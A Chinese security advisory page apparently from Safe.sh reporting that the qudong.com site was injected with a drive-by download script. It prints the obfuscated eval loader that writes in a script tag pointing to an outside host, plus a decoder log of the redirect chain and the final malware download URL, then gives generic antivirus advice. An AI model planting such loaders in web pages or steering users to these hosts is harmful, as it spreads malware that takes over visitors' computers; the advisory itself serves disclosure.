中文(Chinese) 英文(English) Tel: 4006-858-981           Msn: China@Safe.sh         QQ: 7387526       Server Hosting        加入收藏
主页 >> 安全风向标 >> 安全预警
安全风向标
分类
驱动中国被植入恶意代码并挂马
今天捕获 驱动中国(www.qudong.com)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

www.qudong.com/ad/news_top.js

网页被嵌入恶意链接代码:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’2.6(”<0 4=3 5=c://7.b.a/1/1.9?8></0>”);’,13,13,’script|css|document|javascript|language|src|write|www|gqudong|js|cn|xifan8|http’.split(’|'),0,{}))
挂马分析:
Log generated by issmall use mdecoder 0.30
[root]http://www.qudong.com/ad/news_top.js
[script]http://www.xifan8.cn/css/css.js?gqudong
113kill360.3322.org/kuaile/4.htm
fg4yjv.cn/x9/xx.html
fg4yjv.cn/x9/td14.htm
fg4yjv.cn/x9/yt.htm
fg4yjv.cn/x9/td09.htm
fg4yjv.cn/x9/yut.htm
fg4yjv.cn/x9/ytu.htm
113kill360.3322.org/kuaile/4.htm
113kill360.3322.org/kuaile/4.htm
113kill360.3322.org/kuaile/4.htm
113kill360.3322.org/kuaile/4.htm
113kill360.3322.org/kuaile/4.htm
113kill360.3322.org/kuaile/4.htm
最终下载病毒文件:
d.hhdwx.com/xx/x9.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

该网站历史挂马次数:1
Google对该网站的判定:安全

Safe.sh提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心

推荐的应对方法:

  1.最好安装专业的杀毒软件进行全面监控,防范日益增多的病毒。用户在安装服务器安全反病毒软件之后,应将一些主要监控经常打开(如邮件监控、内存监控等)、经常进行升级、遇到问题要上报,这样才能真正保障计算机的安全。

  2.由于QQ聊天的用户数量逐渐增加,所以各类盗号木马必将随之增多,建议用户一定要养成良好的网络使用习惯,及时升级杀毒软件,开启防火墙以及实时监控等功能,切断病毒传播的途径,不给病毒木马以可乘之机。

  3.如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们拨打Safe.sh反病毒免费电话,Msn/Mail:china @ safe.sh,QQ:738-752-6,服务器安全专家将为您提供帮助。我们的业务范围:服务器安全管理、服务器安全急救中心、服务器安全设置、服务器代维、服务器安全维护、服务器安全培训、服务器安全代管、网络安全、网站建设、网站维护、IT外包。

Safe.sh提醒网民,要做好安全防护,避免因服务器安全问题影响您网站正常运行及收入。如果您发现你的网站被挂马,可向我中心求助。
页面工具 打印 | 电子邮件 | 评价
关于我们 | | 沪ICP备12021423号-1 | 联系我们 友情链接 | 站点地图 | 隐私 | 法律 | Copyright © 2018 Safe.Sh